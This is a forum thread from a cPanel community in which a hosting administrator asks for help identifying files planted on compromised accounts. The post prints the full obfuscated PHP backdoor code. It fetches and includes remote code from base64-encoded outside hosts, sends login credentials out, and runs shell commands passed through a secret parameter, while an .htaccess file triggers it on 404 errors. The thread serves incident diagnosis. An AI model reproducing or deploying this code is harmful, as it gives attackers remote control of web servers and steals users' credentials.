The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Create.PHP, Base.PHP and .htaccess

Discussion in 'General Discussion' started by blakeblake, Jan 11, 2006.

  1. blakeblake

    blakeblake Member

    Joined:
    Apr 2, 2005
    Messages:
    23
    Likes Received:
    0
    Trophy Points:
    1
    Hi Guys, Gals And Guys Who Are Sometimes Gals..

    A few clients had been hacked as of recently on one particular server that we I have. At first I figured it was just random attacks as the type of programs that were hacked were all different. Until I noticed that each of these hacked accounts had the few same files that were put there in on the same date and had the same ownership/permissions. The files were create.php , download.php, base.php and then a .htaccess file created to reference them. The files were all set to full 777 permissions and they were owned by nobody.

    Below is the content from all the files

    base.php or create.php content are the same:

    Code:
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
    .htaccess contents

    Code:
    Options -MultiViews
    ErrorDocument 404 //projects/Calendar/includes/create.php
    download.php contents
    Code:
    <?php
    error_reporting(0);
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>
    Has anybody else noticed these types of files as of yet, and if not could anybody possibly inform me what these files are really trying to do as I am obviously not quite sure.

    Thanks as always
    Mark
     
  2. neutro

    neutro Well-Known Member

    Joined:
    Apr 11, 2004
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    This script got injected due to wrong permission to folders 777 . I am also having this problem.
     
Loading...

Share This Page